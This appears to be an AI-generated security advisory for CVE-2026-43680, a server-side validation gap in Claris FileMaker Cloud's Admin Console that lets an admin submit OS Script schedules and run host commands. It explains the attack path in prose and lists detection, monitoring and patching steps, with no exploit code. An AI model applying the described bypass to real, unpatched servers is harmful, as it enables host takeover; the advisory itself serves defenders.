CVE-2026-43680 Overview
CVE-2026-43680 is a Remote Code Execution (RCE) vulnerability in Claris FileMaker Cloud. An authenticated user with Admin Console privileges can bypass a front-end restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. The flaw is classified under CWE-94: Improper Control of Generation of Code. Claris fixed the issue in FileMaker Cloud 2.22.0.5. No public exploit is available, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
Critical Impact
An Admin Console user can execute arbitrary OS commands on the FileMaker Cloud host, leading to full compromise of confidentiality, integrity, and availability.
Affected Products
- Claris FileMaker Cloud versions prior to 2.22.0.5
- Claris FileMaker Cloud Admin Console (OS Script schedule feature)
- Underlying FileMaker Cloud host operating system
Discovery Timeline
- 2026-05-12 - CVE-2026-43680 published to NVD
- 2026-05-14 - Last updated in NVD database
Technical Details for CVE-2026-43680
Vulnerability Analysis
Claris FileMaker Cloud allows administrators to configure scheduled tasks through the Admin Console. One supported schedule type runs OS-level scripts on the host. Cloud deployments restrict this schedule type at the front end to prevent tenants from executing arbitrary commands on the shared infrastructure.
The vulnerability stems from enforcement of this restriction only on the client-side interface. An attacker holding Admin Console credentials can craft requests directly to the back-end scheduling API and submit an OS Script schedule. The server processes the schedule and executes the specified commands on the host operating system.
This pattern aligns with CWE-94, where the application fails to control code generation server-side. The result is arbitrary command execution under the privileges of the FileMaker Server service account.
Root Cause
The root cause is missing server-side validation of schedule type submissions. The Admin Console UI hides or disables the OS Script option for cloud tenants, but the API endpoint accepts and processes the parameter without re-checking authorization or context.
Attack Vector
Exploitation requires high privileges, specifically an authenticated Admin Console account, but no user interaction. The attack is network-reachable through the Admin Console API. An attacker who compromises or is granted admin credentials can pivot from application-level access to full host control. See the Claris Support Article for vendor details.
No verified proof-of-concept code is publicly available. The mechanism involves submitting a crafted schedule creation request to the Admin Console API specifying an OS Script type and an attacker-controlled command payload.
Detection Methods for CVE-2026-43680
Indicators of Compromise
- Unexpected OS Script schedule entries in FileMaker Cloud Admin Console configuration
- Child processes spawned by the FileMaker Server service that are not part of normal database operations
- Outbound network connections originating from the FileMaker Cloud host shortly after schedule creation or execution events
- Admin Console API calls to schedule endpoints from unusual source IP addresses or at atypical times
Detection Strategies
- Audit Admin Console activity logs for schedule creation events where the script type is OS-level
- Compare scheduled tasks on each FileMaker Cloud host against an approved baseline
- Monitor process lineage on FileMaker hosts for shell interpreters, scripting engines, or command utilities launched by the FileMaker Server parent process
- Alert on file writes, registry changes, or persistence artifacts created by the FileMaker service account
Monitoring Recommendations
- Enable verbose audit logging on the FileMaker Cloud Admin Console and forward logs to a centralized SIEM
- Track authentication events for Admin Console accounts and flag logins from new geolocations or devices
- Correlate schedule modification events with subsequent process execution telemetry on the host
- Review service account behavior weekly for deviations from expected database workload patterns
How to Mitigate CVE-2026-43680
Immediate Actions Required
- Upgrade Claris FileMaker Cloud to version 2.22.0.5 or later
- Rotate credentials for all Admin Console accounts after patching
- Review existing scheduled tasks and remove any OS Script entries that were not authorized
- Restrict Admin Console access to a minimum set of named administrators and enforce multi-factor authentication
Patch Information
Claris released FileMaker Cloud 2.22.0.5 to address CVE-2026-43680. The fix enforces the OS Script schedule restriction server-side for cloud deployments. Refer to the Claris Support Article for upgrade instructions and release notes.
Workarounds
- Limit Admin Console privileges to trusted operators only and audit privilege assignments
- Enforce multi-factor authentication on every Admin Console account to reduce credential theft risk
- Place the Admin Console behind a restricted network segment or VPN until the patch is applied
- Monitor host-level process execution for any commands originating from the FileMaker Server service
# Verify the installed FileMaker Cloud version after patching
fmsadmin --version
# Expected output: 2.22.0.5 or later
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
